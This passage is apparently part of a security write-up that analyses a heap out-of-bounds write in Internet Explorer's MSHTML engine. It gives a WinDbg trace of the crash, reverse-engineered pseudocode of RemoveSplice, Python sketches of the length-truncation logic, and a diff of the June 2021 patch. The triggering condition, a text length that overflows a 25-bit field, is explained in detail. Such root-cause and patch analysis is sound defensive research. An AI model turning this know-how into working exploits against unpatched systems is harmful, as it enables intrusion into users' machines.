63a46795 e8cd118900 call MSHTML!CTreePos::GetCp (642d7967) ; Returns 0x00680004
    ; Array(40370176), 40370176-1 = 0x267ffff
    ; CTreeDataPos->DATAPOSTEXT->_cch (25 bits), 0x67ffff
    ; 0x00680004 = 0x67ffff + 0x5
    ; The <ROOT>, <html>, <head>, </head> and <body> tags each count as 1 character
0:008:x86> p
eax=00680004 ebx=0508cb38 ecx=00000000 edx=04aae5c4 esi=0508ca08 edi=ffffffff
eip=63a4679a esp=0508c7a8 ebp=0508c9f0 iopl=0 nv up ei pl zr na pe nc
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00000246
MSHTML!CSpliceTreeEngine::RemoveSplice+0x47a:
63a4679a 8b4e18 mov ecx,dword ptr [esi+18h] ds:002b:0508ca20=04aae5c4
0:008:x86> p
eax=00680004 ebx=0508cb38 ecx=04aae5c4 edx=04aae5c4 esi=0508ca08 edi=ffffffff
eip=63a4679d esp=0508c7a8 ebp=0508c9f0 iopl=0 nv up ei pl zr na pe nc
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00000246
MSHTML!CSpliceTreeEngine::RemoveSplice+0x47d:
63a4679d 8d1407 lea edx,[edi+eax] ; edx = 0x00680003
    ; _ptpSourceL (<head>), _ptpSourceR (</body>)
    ; CTreeDataPos->DATAPOSTEXT->_cch (25 bits), 0x67ffff
    ; 0x00680003 = 0x67ffff + 0x4
    ; The <head>, </head>, <body> and </body> tags each count as 1 character
......
0:008:x86> g
Breakpoint 2 hit
MSHTML!CSpliceTreeEngine::RemoveSplice+0x495:
63a467b5 8b442458 mov eax,dword ptr [esp+58h] ss:002b:0508c800=00680004
0:008:x86> p
MSHTML!CSpliceTreeEngine::RemoveSplice+0x499:
63a467b9 3b442460 cmp eax,dword ptr [esp+60h] ss:002b:0508c808=00680004
0:008:x86> p
MSHTML!CSpliceTreeEngine::RemoveSplice+0x49d:
63a467bd 0f8f36ac1400 jg MSHTML!CSpliceTreeEngine::RemoveSplice+0x14b0d9 (63b913f9) [br=0]
0:008:x86> p
eax=00680004 ebx=0508cb38 ecx=04aae5c4 edx=00680003 esi=0508ca08 edi=ffffffff
eip=63a467c3 esp=0508c7a8 ebp=0508c9f0 iopl=0 nv up ei pl zr na pe nc
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00000246
MSHTML!CSpliceTreeEngine::RemoveSplice+0x4a3:
63a467c3 8d0c12 lea ecx,[edx+edx]
0:008:x86> p
eax=00680004 ebx=0508cb38 ecx=00d00006 edx=00680003 esi=0508ca08 edi=ffffffff
eip=63a467c6 esp=0508c7a8 ebp=0508c9f0 iopl=0 nv up ei pl zr na pe nc
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00000246
MSHTML!CSpliceTreeEngine::RemoveSplice+0x4a6:
63a467c6 e8c3fa1e00 call MSHTML!ProcessHeapAlloc<0> (63c3628e) ; The heap block is sized from the truncated text length
0:008:x86> p
eax=21d4e020 ebx=0508cb38 ecx=00d00006 edx=00000000 esi=0508ca08 edi=ffffffff
eip=63a467cb esp=0508c7a8 ebp=0508c9f0 iopl=0 nv up ei pl zr na pe nc
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00000246
MSHTML!CSpliceTreeEngine::RemoveSplice+0x4ab:
63a467cb 89465c mov dword ptr [esi+5Ch],eax ds:002b:0508ca64=00000000
0:008:x86> !heap -x eax
Entry User Heap Segment Size PrevSize Unused Flags
-----------------------------------------------------------------------------
0000000021d4e018 0000000021d4e020 0000000000670000 0000000000670000 d01000 0 ffa busy extra virtual
0:008:x86> g
Breakpoint 3 hit
eax=000002e4 ebx=0508cb38 ecx=04a849f0 edx=00000003 esi=0508ca08 edi=0000fdef
eip=63a468cf esp=0508c7a8 ebp=0508c9f0 iopl=0 nv up ei pl nz na po nc
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00000202
MSHTML!CSpliceTreeEngine::RemoveSplice+0x5af:
63a468cf 8b4920 mov ecx,dword ptr [ecx+20h] ds:002b:04a84a10=1d02f020
0:008:x86> dd ecx lc ; CTreeDataPos(Text)
04a849f0 000002e4 00000002 04aae564 04aae54c
04a84a00 04aae5ac 04aae5c4 00000041 00000000
04a84a10 1d02f020 8267ffff 00000000 00000000
0:008:x86> !heap -x 1d02f020
Entry User Heap Segment Size PrevSize Unused Flags
-----------------------------------------------------------------------------
000000001d02f018 000000001d02f020 0000000000670000 0000000000670000 4d01000 0 ffa busy extra virtual
0:008:x86> dd 1d02f020 l10 ; Tree::TextData object
1d02f020 00000002 0267ffff 002c002c 002c002c
1d02f030 002c002c 002c002c 002c002c 002c002c
1d02f040 002c002c 002c002c 002c002c 002c002c
1d02f050 002c002c 002c002c 002c002c 002c002c
0:008:x86> dd 1d02f020+0x2680000*2-0x10 l10
21d2f010 002c002c 002c002c 002c002c 002c002c
21d2f020 002c002c 0000002c 00000000 00000000
21d2f030 00000000 00000000 00000000 00000000
21d2f040 00000000 00000000 00000000 00000000
0:008:x86> p
eax=000002e4 ebx=0508cb38 ecx=1d02f020 edx=00000003 esi=0508ca08 edi=0000fdef
eip=63a468d2 esp=0508c7a8 ebp=0508c9f0 iopl=0 nv up ei pl nz na po nc
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00000202
MSHTML!CSpliceTreeEngine::RemoveSplice+0x5b2:
63a468d2 8d442414 lea eax,[esp+14h]
0:008:x86> p
eax=0508c7bc ebx=0508cb38 ecx=1d02f020 edx=00000003 esi=0508ca08 edi=0000fdef
eip=63a468d6 esp=0508c7a8 ebp=0508c9f0 iopl=0 nv up ei pl nz na po nc
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00000202
MSHTML!CSpliceTreeEngine::RemoveSplice+0x5b6:
63a468d6 50 push eax ; Local variable that receives the text length actually obtained
0:008:x86> p
eax=0508c7bc ebx=0508cb38 ecx=1d02f020 edx=00000003 esi=0508ca08 edi=0000fdef
eip=63a468d7 esp=0508c7a4 ebp=0508c9f0 iopl=0 nv up ei pl nz na po nc
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00000202
MSHTML!CSpliceTreeEngine::RemoveSplice+0x5b7:
63a468d7 6a00 push 0 ; skip_cch, the number of characters to skip
0:008:x86> p
eax=0508c7bc ebx=0508cb38 ecx=1d02f020 edx=00000003 esi=0508ca08 edi=0000fdef
eip=63a468d9 esp=0508c7a0 ebp=0508c9f0 iopl=0 nv up ei pl nz na po nc
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00000202
MSHTML!CSpliceTreeEngine::RemoveSplice+0x5b9:
63a468d9 e890b1fbff call MSHTML!Tree::TextData::GetText (63a01a6e)
0:008:x86> p
eax=1d02f028 ebx=0508cb38 ecx=1d02f020 edx=0508c7bc esi=0508ca08 edi=0000fdef
eip=63a468de esp=0508c7a8 ebp=0508c9f0 iopl=0 nv up ei pl nz na po nc
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00000202
MSHTML!CSpliceTreeEngine::RemoveSplice+0x5be:
63a468de 8b7c2414 mov edi,dword ptr [esp+14h] ss:002b:0508c7bc=0267ffff
0:008:x86> dd eax-0x8 l10 ; The return value points to the text string, 8 bytes into the Tree::TextData object
1d02f020 00000002 0267ffff 002c002c 002c002c
1d02f030 002c002c 002c002c 002c002c 002c002c
1d02f040 002c002c 002c002c 002c002c 002c002c
1d02f050 002c002c 002c002c 002c002c 002c002c
0:008:x86> dd 0508c7bc l1
0508c7bc 0267ffff ; Text length actually obtained, the untruncated length, 0x0267ffff = 40370176 - 1
0:008:x86> p
eax=1d02f028 ebx=0508cb38 ecx=1d02f020 edx=0508c7bc esi=0508ca08 edi=0267ffff
eip=63a468e2 esp=0508c7a8 ebp=0508c9f0 iopl=0 nv up ei pl nz na po nc
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00000202
MSHTML!CSpliceTreeEngine::RemoveSplice+0x5c2:
63a468e2 8b4c2424 mov ecx,dword ptr [esp+24h] ss:002b:0508c7cc=00000003
0:008:x86> p
eax=1d02f028 ebx=0508cb38 ecx=00000003 edx=0508c7bc esi=0508ca08 edi=0267ffff
eip=63a468e6 esp=0508c7a8 ebp=0508c9f0 iopl=0 nv up ei pl nz na po nc
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00000202
MSHTML!CSpliceTreeEngine::RemoveSplice+0x5c6:
63a468e6 8b54241c mov edx,dword ptr [esp+1Ch] ss:002b:0508c7c4=00680003
0:008:x86> p
eax=1d02f028 ebx=0508cb38 ecx=00000003 edx=00680003 esi=0508ca08 edi=0267ffff
eip=63a468ea esp=0508c7a8 ebp=0508c9f0 iopl=0 nv up ei pl nz na po nc
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00000202
MSHTML!CSpliceTreeEngine::RemoveSplice+0x5ca:
63a468ea 57 push edi ; edi, length of the source text string (untruncated)
0:008:x86> p
eax=1d02f028 ebx=0508cb38 ecx=00000003 edx=00680003 esi=0508ca08 edi=0267ffff
eip=63a468eb esp=0508c7a4 ebp=0508c9f0 iopl=0 nv up ei pl nz na po nc
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00000202
MSHTML!CSpliceTreeEngine::RemoveSplice+0x5cb:
63a468eb 50 push eax ; eax, address of the source text string
0:008:x86> p
eax=1d02f028 ebx=0508cb38 ecx=00000003 edx=00680003 esi=0508ca08 edi=0267ffff
eip=63a468ec esp=0508c7a0 ebp=0508c9f0 iopl=0 nv up ei pl nz na po nc
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00000202
MSHTML!CSpliceTreeEngine::RemoveSplice+0x5cc:
63a468ec 8b465c mov eax,dword ptr [esi+5Ch] ds:002b:0508ca64=21d4e020
0:008:x86> p
eax=21d4e020 ebx=0508cb38 ecx=00000003 edx=00680003 esi=0508ca08 edi=0267ffff
eip=63a468ef esp=0508c7a0 ebp=0508c9f0 iopl=0 nv up ei pl nz na po nc
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00000202
MSHTML!CSpliceTreeEngine::RemoveSplice+0x5cf:
63a468ef 2bd1 sub edx,ecx ; edx, size of the destination, based on the truncated text length
0:008:x86> p
eax=21d4e020 ebx=0508cb38 ecx=00000003 edx=00680000 esi=0508ca08 edi=0267ffff
eip=63a468f1 esp=0508c7a0 ebp=0508c9f0 iopl=0 nv up ei pl nz na pe nc
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00000206
MSHTML!CSpliceTreeEngine::RemoveSplice+0x5d1:
63a468f1 8d0c48 lea ecx,[eax+ecx*2] ; ecx, destination address
0:008:x86> p
eax=21d4e020 ebx=0508cb38 ecx=21d4e026 edx=00680000 esi=0508ca08 edi=0267ffff
eip=63a468f4 esp=0508c7a0 ebp=0508c9f0 iopl=0 nv up ei pl nz na pe nc
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00000206
MSHTML!CSpliceTreeEngine::RemoveSplice+0x5d4:
63a468f4 e8b8852500 call MSHTML!wmemcpy_s (63c9eeb1)
0:008:x86> dd esp l2
0508c7a0 1d02f028 0267ffff
0:008:x86> p
Invalid parameter passed to C runtime function.
eax=00000022 ebx=0508cb38 ecx=8cccdfa3 edx=00000000 esi=0508ca08 edi=0267ffff
eip=63a468f9 esp=0508c7a0 ebp=0508c9f0 iopl=0 nv up ei pl nz na po nc
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00000202
MSHTML!CSpliceTreeEngine::RemoveSplice+0x5d9:
63a468f9 8b4c2418 mov ecx,dword ptr [esp+18h] ss:002b:0508c7b8=04a849f0
0:008:x86> g
(638.ad8): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=21d4e020 ebx=0508cb38 ecx=04aae5c4 edx=02680002 esi=0508ca08 edi=0000fdef
eip=63a46809 esp=0508c7a8 ebp=0508c9f0 iopl=0 nv up ei pl nz na po nc
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00010202
MSHTML!CSpliceTreeEngine::RemoveSplice+0x4e9:
63a46809 66893c50 mov word ptr [eax+edx*2],di ds:002b:26a4e024=???? ; Crash
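The numbers in the trace can be cross-checked with a short calculation. The sketch below only re-derives values that appear in the WinDbg output (the two GetCp() results, the allocation size and the faulting address); the variable names are hypothetical and the buffer address is specific to this debugging run.

```python
# Every constant below is read off the WinDbg trace; the variable names are hypothetical.
text_cch = 40370176 - 1                # Array(40370176).toString() is 40370175 commas
truncated_cch = text_cch & 0x1FFFFFF   # what a 25-bit length field can hold

cp_left = 0x2                          # CTreePos::GetCp(_ptpSourceL) in the trace
cp_right = 0x680004                    # CTreePos::GetCp(_ptpSourceR) in the trace
span_cch = (1 - cp_left) + cp_right    # lea edx,[edi+eax]

alloc_bytes = 2 * span_cch             # lea ecx,[edx+edx] before ProcessHeapAlloc
buffer_base = 0x21D4E020               # address returned by ProcessHeapAlloc in this run
last_index = 3 + text_cch              # Cch: three tag markers, then the untruncated text
fault_addr = buffer_base + 2 * last_index

print(hex(text_cch), hex(truncated_cch))
print(hex(span_cch), hex(alloc_bytes))
print(hex(fault_addr), fault_addr >= buffer_base + alloc_bytes)
```

The computed index 0x2680002 and address 0x26a4e024 match edx and the faulting address in the access violation, which lies far beyond the 0xd00006-byte allocation.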
Below is the key part of the vulnerable function CSpliceTreeEngine::RemoveSplice() (obtained by reverse engineering):
HRESULT __thiscall CSpliceTreeEngine::RemoveSplice(CSpliceTreeEngine *this)
{
  ...
  hr1 = CSpliceTreeEngine::CSpliceAnchor::AnchorAt(&pSpliceAnchorL, ptpSourceL, 1, 0);
  if ( hr1 || (hr1 = CSpliceTreeEngine::CSpliceAnchor::AnchorAt(&pSpliceAnchorR, this->_ptpSourceR, 0, 1)) != 0 )
  {
LABEL_156:
    hr = hr1;
    goto LABEL_157;
  }
  if ( this->_ptpSourceR->_pRight != this->_ptpSourceL )
  {
    ...
    if ( HIBYTE(v179) && (this->field_54 & 4) != 0 )
    {
      ptpSourceL_cchLeft = 1 - CTreePos::GetCp(this->_ptpSourceL);
      ptpSourceR_cchLeft = CTreePos::GetCp(this->_ptpSourceR);
      ptpSourceR = this->_ptpSourceR;
      fNotText = (ptpSourceR->_cElemLeftAndFlags & 4) == 0;
      ptpSourceR_to_ptpSourceL_cch = ptpSourceL_cchLeft + ptpSourceR_cchLeft;
      if ( !fNotText )
      {
        TextLength = CTreeDataPos::GetTextLength(ptpSourceR);
        ptpSourceR_to_ptpSourceL_cch = TextLength + ptpSourceR_to_ptpSourceL_cch - 1;
      }
      LOBYTE(ptpSourceR) = HIBYTE(v179);
      v11 = cch;
    }
    ...
    if ( ptpSourceR )
    {
      if ( (this->field_54 & 4) != 0 )
      {
        ptpSourceL_cchLeft = 1 - CTreePos::GetCp(this->_ptpSourceL);
        ptpSourceR_cchLeft = CTreePos::GetCp(this->_ptpSourceR);
        ptpSourceR = this->_ptpSourceR;
        fNotText = (ptpSourceR->_cElemLeftAndFlags & 4) == 0;
        ptpSourceR_to_ptpSourceL_cch1 = ptpSourceL_cchLeft + ptpSourceR_cchLeft;
        if ( !fNotText )
        {
          TextLength = CTreeDataPos::GetTextLength(ptpSourceR);
          ptpSourceR_to_ptpSourceL_cch1 = TextLength + ptpSourceR_to_ptpSourceL_cch1 - 1;
        }
      }
    }
    ...
  }
  ...
  while ( 1 )
  {
    ptpSourceL = this->_ptpSourceL;
    if ( (ptpSourceL->_cElemLeftAndFlags & 8) == 0 || ptpSourceL == this->_ptpSourceR )
      break;
    ptpSourceL_Right = ptpSourceL->_pRight;
    if ( (ptpSourceL->dptp.p._dwPointerAndGravityAndCling & 2) != 0 )
      Tree::TreeWriter::Remove(ptpSourceL, &this->_pMarkupSource->_tpRoot, &this->_pMarkupSource->_ptpFirst);
    this->_ptpSourceL = ptpSourceL_Right;
  }
  while ( 1 )
  {
    ptpSourceR = this->_ptpSourceR;
    if ( (ptpSourceR->_cElemLeftAndFlags & 8) == 0 || this->_ptpSourceL == ptpSourceR )
      break;
    ptpSourceR_Left = ptpSourceR->_pLeft;
    if ( (ptpSourceR->dptp.p._dwPointerAndGravityAndCling & 2) != 0 )
      Tree::TreeWriter::Remove(ptpSourceR, &this->_pMarkupSource->_tpRoot, &this->_pMarkupSource->_ptpFirst);
    this->_ptpSourceR = ptpSourceR_Left;
  }
  ...
  if ( (ptpSourceR->_cElemLeftAndFlags & 4) == 0
    || ptpSourceR == this->_ptpSourceL
    || (hr = CSpliceTreeEngine::CSpliceAnchor::AnchorAt(&pSpliceAnchor, ptpSourceR, 1, 1), (hr1 = hr) == 0) )
  {
    ...
    while ( 1 )
    {
      Cch = 0;
      if ( HIBYTE(v179) && (this->field_54 & 4) != 0 )
      {
        // Character count of the span to remove; text nodes contribute their truncated 25-bit length
        ptpSourceL_cchLeft = 1 - CTreePos::GetCp(this->_ptpSourceL);
        ptpSourceR_cchLeft = CTreePos::GetCp(this->_ptpSourceR);
        ptpSourceR = this->_ptpSourceR;
        ptpSourceR_to_ptpSourceL_cch2 = ptpSourceL_cchLeft + ptpSourceR_cchLeft;
        fNotText = (ptpSourceR->_cElemLeftAndFlags & 4) == 0;
        ptpSourceR_to_ptpSourceL_cch2 = ptpSourceL_cchLeft + ptpSourceR_cchLeft;
        if ( !fNotText )
        {
          TextLength = CTreeDataPos::GetTextLength(ptpSourceR);
          ptpSourceR_to_ptpSourceL_cch2 = TextLength + ptpSourceR_to_ptpSourceL_cch2 - 1;
        }
        if ( ptpSourceR_to_ptpSourceL_cch > ptpSourceR_to_ptpSourceL_cch1 )
        {
          ...
        }
        else
        {
          // The buffer is sized from the truncated character count
          pUndoChRecord = operator new[](2 * ptpSourceR_to_ptpSourceL_cch2);
          this->_pUndoChRecord = pUndoChRecord;
          if ( pUndoChRecord )
          {
            ptpSourceR = this->_ptpSourceR;
            ptpSourceL = this->_ptpSourceL;
            for ( ptp = ptpSourceL; ptp != ptpSourceR->_pRight; ptp = ptp->_pRight )
            {
              ptp_cElemLeftAndFlags = ptp->_cElemLeftAndFlags;
              if ( (ptp_cElemLeftAndFlags & 4) != 0 )
              {
                // TextLen is the untruncated length stored in Tree::TextData
                pText = Tree::TextData::GetText(ptp->_pTextData, 0, &TextLen);
                wmemcpy_s(&this->_pUndoChRecord[Cch], ptpSourceR_to_ptpSourceL_cch2 - Cch, pText, TextLen);
                // Cch advances by the untruncated length even when wmemcpy_s rejects the copy
                Cch += TextLen;
              }
              else if ( (ptp_cElemLeftAndFlags & 3) != 0 && (ptp_cElemLeftAndFlags & 0x40) != 0 )
              {
                // Out-of-bounds write once Cch exceeds the allocated size
                this->_pUndoChRecord[Cch++] = 0xFDEF;
              }
            }
          }
          else
          {
            ...
          }
        }
      }
      ...
    }
    ...
  }
  ...
}
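The root cause of the heap out-of-bounds write is that the CTreeDataPos object, which marks the position of a text string in the DOM tree/DOM stream, records the string length in two places of different width: the _cch member of the DATAPOSTEXT structure (25 bits) and the _cch member of the Tree::TextData object (32 bits). When the string length exceeds what 25 bits can represent, the value stored in DATAPOSTEXT._cch is truncated. Later, when CSpliceTreeEngine::RemoveSplice() removes the text string's structures from the DOM tree/DOM stream, it calls CTreePos::GetCp() to obtain the number of characters occupied by the structures being removed (which includes the truncated text length) and allocates a buffer of that size. It then calls Tree::TextData::GetText() to obtain the untruncated length stored in Tree::TextData._cch and uses that length as an index when writing into the buffer allocated earlier, which results in the heap out-of-bounds write.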
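The mismatch between the two length fields can be modelled in a few lines. This is a simplified sketch, not the real MSHTML logic: it assumes that every tag position counts as one character, that text positions contribute their 25-bit truncated length to the buffer size, and that the write index advances by the untruncated length, as the trace suggests. The function name and the stream representation are hypothetical.

```python
CCH_BITS = 25                      # width of DATAPOSTEXT._cch according to the analysis
CCH_MASK = (1 << CCH_BITS) - 1


def simulate_undo_record(stream):
    """Model the copy loop and return (buffer_cch, out-of-bounds write indexes).

    stream is a list of (kind, length) pairs, where kind is "tag" or "text".
    """
    # The buffer is sized from the tree bookkeeping, which only sees truncated text lengths.
    buffer_cch = sum((n & CCH_MASK) if kind == "text" else 1 for kind, n in stream)
    cch = 0
    oob_writes = []
    for kind, n in stream:
        if kind == "text":
            # A bounds-checked copy may be rejected, but the index still advances by the full length.
            cch += n
        else:
            if cch >= buffer_cch:
                oob_writes.append(cch)   # the 0xFDEF marker would land outside the buffer
            cch += 1
    return buffer_cch, oob_writes


# <head>, </head>, <body>, text, </body> with the PoC's text length
poc = [("tag", 1), ("tag", 1), ("tag", 1), ("text", 0x267FFFF), ("tag", 1)]
size, oob = simulate_undo_record(poc)
print(hex(size), [hex(i) for i in oob])
```

With the PoC's length the model gives a buffer of 0x680003 characters and a single out-of-bounds write at index 0x2680002, while any text shorter than 0x2000000 characters produces no out-of-bounds index.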
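Vulnerability Fix
The environment used to analyze this vulnerability was Windows 10 1809 Pro x64. The MSRC advisory page for this vulnerability lists KB5003646 as the patch for this environment. However, the patch details page shows that this patch applies only to LTSC editions, and it could not be installed in the current environment. I therefore used a Windows 10 Enterprise LTSC 2019 environment to install and analyze the patch. The image I used is the Windows 10 Enterprise LTSC 2019 release from March 2019. Installing the patch on it first requires a servicing stack update (SSU) released after May 11, 2021; I installed KB5003711, after which KB5003646 installed successfully.
Because KB5003646 is a cumulative update released on June 8, 2021, diffing two module files taken from environments whose update levels are far apart would make the patch hard to locate. We therefore need the number of the cumulative update released in May 2021, which can be found on the details page for KB5003646 in the Microsoft Update Catalog.
The mshtml.dll versions that correspond to KB5003171 and KB5003646 are as follows: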
Patch number | mshtml.dll version |
---|---|
KB5003171 | 11.0.17763.1911 |
KB5003646 | 11.0.17763.1999 |
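Next, we extract mshtml.dll from both patch levels, open each file in IDA to generate an IDB file, and then compare them with BinDiff. Some combinations of IDA and BinDiff versions are incompatible; I used IDA Pro 7.5 with BinDiff 6. The analysis produced the following result:
From the root cause analysis above, we know that this vulnerability is related to text strings. In the BinDiff results, the only functions with differences that are related to text strings are Tree::TreeWriter::NewTextPosInternal() and CTreeDataPos::GetPlainTextLength(). After statically analyzing both functions in IDA, the patch can be located in Tree::TreeWriter::NewTextPosInternal(). The reasoning is as follows. CTreeDataPos::GetPlainTextLength() calls Tree::TextData::GetText(), and the reversed code of Tree::TextData::GetText() given earlier shows that this function returns the pointer and length of the text string from the Tree::TextData object. The _cch member of the Tree::TextData object stores the string length and is 32 bits wide. The _cch member of the DATAPOSTEXT structure in the CTreeDataPos object also stores the string length, but it is only 25 bits wide. If the string length exceeds the range that 25 bits can represent, it is truncated when it is stored into DATAPOSTEXT._cch. The patch should therefore validate the string length at the point where it is written to DATAPOSTEXT._cch, so the patch is not located in CTreeDataPos::GetPlainTextLength().
The figure below shows the patch code added to Tree::TreeWriter::NewTextPosInternal():
Below is the cleaned-up IDA decompilation of Tree::TreeWriter::NewTextPosInternal() before and after the patch: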
// Before the patch
void __fastcall Tree::TreeWriter::NewTextPosInternal(CTreeDataPos **ppTreeDataPos, const wchar_t *SrcTextPtr, ULONG SrcTextCch, const CTreePos *a4, enum htmlLayoutMode eHLM, BYTE sid, LONG lTextID, int a8, bool a9)
{
  CTreeDataPos *pTreeDataPos;

  pTreeDataPos = *ppTreeDataPos;
  pTreeDataPos->_cElemLeftAndFlags = pTreeDataPos->_cElemLeftAndFlags & 0xFFFFFFF4 | 4;
  if ( a9 )
    pTreeDataPos->dptp.t._lTextID |= 0x20000000u;
  // The length is masked to 25 bits without any range check
  pTreeDataPos->dptp.t._sid_cch = SrcTextCch & 0x1FFFFFF | (sid << 25);
  if ( eHLM < 80000 )
    pTreeDataPos->dptp.t._lTextID = lTextID;
  else
    pTreeDataPos->dptp.t._lTextID = (a9 << 29) | ((a8 << 30) | lTextID & 0x1FFFFFFF) & 0xDFFFFFFF;
  pTreeDataPos->_ulRefs_Flags = pTreeDataPos->_ulRefs_Flags & 0xFFFFFFF7 | 3;
  CTreeDataPos::UpdateWhiteSpaceTypeConsideringNewText(pTreeDataPos, SrcTextPtr, SrcTextCch);
}

// After the patch
void __fastcall Tree::TreeWriter::NewTextPosInternal(CTreeDataPos **ppTreeDataPos, const wchar_t *SrcTextPtr, ULONG SrcTextCch, const CTreePos *a4, enum htmlLayoutMode eHLM, BYTE sid, LONG lTextID, int a8, bool a9)
{
  CTreeDataPos *pTreeDataPos;

  pTreeDataPos = *ppTreeDataPos;
  (*ppTreeDataPos)->_cElemLeftAndFlags = (*ppTreeDataPos)->_cElemLeftAndFlags & 0xFFFFFFF4 | 4;
  if ( a9 )
    pTreeDataPos->dptp.t._lTextID |= 0x20000000u;
  // New check: the length must fit in 25 bits
  if ( (unsigned __int8)wil::Feature<__WilFeatureTraits_Feature_Servicing_2106b_33613045>::__private_IsEnabled() )
    Release_Assert((int)SrcTextCch < 0x2000000);
  pTreeDataPos->dptp.t._sid_cch = SrcTextCch & 0x1FFFFFF | (sid << 25);
  if ( eHLM >= 80000 )
    pTreeDataPos->dptp.t._lTextID = (a9 << 29) | ((a8 << 30) | lTextID & 0x1FFFFFFF) & 0xDFFFFFFF;
  else
    pTreeDataPos->dptp.t._lTextID = lTextID;
  pTreeDataPos->_ulRefs_Flags = pTreeDataPos->_ulRefs_Flags & 0xFFFFFFF7 | 3;
  CTreeDataPos::UpdateWhiteSpaceTypeConsideringNewText(pTreeDataPos, SrcTextPtr, SrcTextCch);
}

void __fastcall Release_Assert(bool a1)
{
  if ( !a1 )
    Abandonment::AssertionFailed();
}

void __stdcall Abandonment::AssertionFailed()
{
  void *retaddr;

  Abandonment::InduceAbandonment(10, retaddr, 0, 0);
  __debugbreak();
}

void __thiscall Abandonment::InduceAbandonment(void *this, int a2, int a3)
{
  Abandonment::hostExceptionFilter = SetUnhandledExceptionFilter(0);
  RaiseException(0x80000003, 1u, this, 0);
}
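As shown above, the patched Tree::TreeWriter::NewTextPosInternal() adds a check before it writes the text string length into the _cch member of the DATAPOSTEXT structure in the CTreeDataPos object. The check is guarded by a wil servicing feature flag. If the condition SrcTextCch < 0x2000000 does not hold, that is, if the length does not fit in 25 bits, the assertion fails. An ordinary assertion (assert()) is only evaluated in debug builds and is compiled out of release builds. Release_Assert(), in contrast, is an assertion helper inside mshtml.dll that stays active in release builds. When the assertion fails, Abandonment::InduceAbandonment() calls SetUnhandledExceptionFilter(0), which resets the top-level unhandled exception filter to the default and saves the previous one, and then raises a noncontinuable breakpoint exception (0x80000003) through RaiseException(). From that point on, execution stays in the exception handling path, so IE never reaches the code that performs the heap out-of-bounds write.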
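The effect of the added check can be illustrated with a small model of the store into _sid_cch. This is a sketch based only on the decompilation above: the signed comparison mirrors the (int) cast, the feature-flag gate is left out, and the function names and the use of a Python exception in place of process abandonment are assumptions for illustration.

```python
CCH_LIMIT = 0x2000000   # 1 << 25, the bound used in the patched function


def to_int32(value):
    """Reinterpret an unsigned 32-bit value as signed, like the (int) cast in the decompilation."""
    value &= 0xFFFFFFFF
    return value - 0x100000000 if value & 0x80000000 else value


def unpatched_store_cch(src_text_cch, sid):
    """Pre-patch behaviour: silently mask the length to 25 bits."""
    return (src_text_cch & 0x1FFFFFF) | ((sid << 25) & 0xFFFFFFFF)


def patched_store_cch(src_text_cch, sid):
    """Post-patch behaviour: refuse lengths that fail the assertion (modelled as an exception)."""
    if not (to_int32(src_text_cch) < CCH_LIMIT):
        raise RuntimeError("Release_Assert failed: text length does not fit in 25 bits")
    return unpatched_store_cch(src_text_cch, sid)


print(hex(unpatched_store_cch(0x267FFFF, 0x41)))   # truncated value, as seen in the memory dump
print(hex(patched_store_cch(0x67FFFF, 0x41)))      # a length that fits passes the check
```

In this model the PoC's length 0x267ffff is stored as 0x8267ffff before the patch, matching the _sid_cch value in the memory dump, and is rejected after the patch.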